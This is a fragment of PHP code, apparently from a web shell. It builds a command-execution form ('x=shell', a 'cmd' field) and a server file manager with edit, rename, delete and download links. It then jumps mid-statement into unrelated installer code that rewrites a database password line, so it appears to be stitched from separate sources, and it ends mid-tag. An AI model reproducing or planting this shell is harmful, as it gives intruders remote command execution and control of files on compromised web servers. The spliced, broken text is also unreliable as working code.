$buff = " <form action=\"?y=" . $pwd . "&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\"> <table class=\"cmdbox\" style=\"width:50%;\"> <tr><td>{$prompt}</td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form> <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <tr><td>view file/folder</td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"" . $pwd . "\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form></table><table class=\"explore\"> <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr> ";
if ($tree > 2) {
for ($i = 0; $i < $tree - 2; $i++) {
$parent .= $path[$i] . DIRECTORY_SEPARATOR;
}
} else {
$parent = $pwd;
}
foreach ($dname as $folder) {
if ($folder == ".") {
if (!$win && $posix) {
$name = @posix_getpwuid(@fileowner($folder));
$group = @posix_getgrgid(@filegroup($folder));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $user;
}
$buff .= "<tr><td><a href=\"?y=" . $pwd . "\">{$folder}</a></td><td>LINK</td><td style=\"text-align:center;\">" . $owner . "</td><td>" . get_perms($pwd) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($pwd)) . "</td><td><span id=\"titik1\"><a href=\"?y={$pwd}&edit=" . $pwd . "newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span> <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form></td></tr> ";
} elseif ($folder == "..") {
if (!$win && $posix) {
$name = @posix_getpwuid(@fileowner($folder));
$group = @posix_getgrgid(@filegroup($folder));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $user;
}
$buff .= "<tr><td><a href=\"?y=" . $parent . "\">{$folder}</a></td><td>LINK</td><td style=\"text-align:center;\">" . $owner . "</td><td>" . get_perms($parent) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($parent)) . "</td><td><span id=\"titik2\"><a href=\"?y={$pwd}&edit=" . $parent . "newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span> <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form> </td></tr>";
} else {
if (!$win && $posix) {
$name = @posix_getpwuid(@fileowner($folder));
$group = @posix_getgrgid(@filegroup($folder));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $user;
}
$buff .= "<tr><td><a id=\"" . clearspace($folder) . "_link\" href=\"?y=" . $pwd . $folder . DIRECTORY_SEPARATOR . "\">[ {$folder} ]</a> <form action=\"?y={$pwd}\" method=\"post\" id=\"" . clearspace($folder) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"" . $folder . "\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $folder . "\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($folder) . "_form','" . clearspace($folder) . "_link');\" /> </form> <td>DIR</td><td style=\"text-align:center;\">" . $owner . "</td><td>" . get_perms($pwd . $folder) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($folder)) . "</td><td><a href=\"javascript:tukar('" . clearspace($folder) . "_link','" . clearspace($folder) . "_form');\">rename</a> | <a href=\"?y={$pwd}&fdelete=" . $pwd . $folder . "\">delete</a></td></tr>";
}
}
foreach ($fname as $file) {
$full = $pwd . $file;
if (!$win && $posix) {
$name = @posix_getpwuid(@fileowner($file));
$group = @posix_getgrgid(@filegroup($file));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $user;
}
$buff .= "<tr><td><a id=\"" . clearspace($file) . "_link\" href=\"?y={$pwd}&view={$full}\">{$file}</a> <form action=\"?y={$pwd}\" method=\"post\" id=\"" . clearspace($file) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"" . $file . "\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $file . "\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form');\" /> </form> </td><td>" . ukuran($full) . "</td><td style=\"text-align:center;\">" . $owner . "</td><td>" . get_perms($full) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($full)) . "</td> <td><a href=\"?y={$pwd}&edit={$full}\">edit</a> | <a href=\"javascript:tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form');\">rename</a> | <a href=\"?y={$pwd}&delete={$full}\">delete</a> | <a href=\"?y={$pwd}&dl={$full}\">download</a> (<a href=\"?y={$pwd}&dlgzip={$full}\">gzip</a>)</td></tr>";
}
$buff .= "</table>";
return $buff;
}
echo "<br><font color=\"green\">{$line_num}: {$newline}</font>\n";
} else {
if (ereg("([\t ]*)var([\t ]*)\\\$Password([\t ]*)=([\t ]*)", $line, $regs)) {
$newline = $regs[1] . "var" . $regs[2] . "\$Password" . $regs[3] . "=" . $regs[4] . "\"{$dbpass}\";";
fwrite($fd, $newline . "\n");
echo "<br><font color=\"green\">{$line_num}: {$newline}</font>\n";
} else {
fwrite($fd, $line);
}
}
}
}
}
fclose($fd);
$mode = fileperms($dbconfile);
echo "<p>Don't forget to change the permissions " . get_perms($mode) . " of {$dbconfile}, so that only your web server can read it!\n";
} else {
echo "<p><font color=\"red\">Database error: " . mysql_error() . "</font>\n";
}
@mysql_close($db);
} else {
echo "<p><font color=\"red\">Database error: " . mysql_error() . "</font>\n";
}
?>
<p>[ <a href="install.php?action=create_db&dbhost=<?php
echo urlencode($dbhost);
?>
&dbaduname=<?php
echo urlencode($dbaduname);
?>
&dbadpass=<?php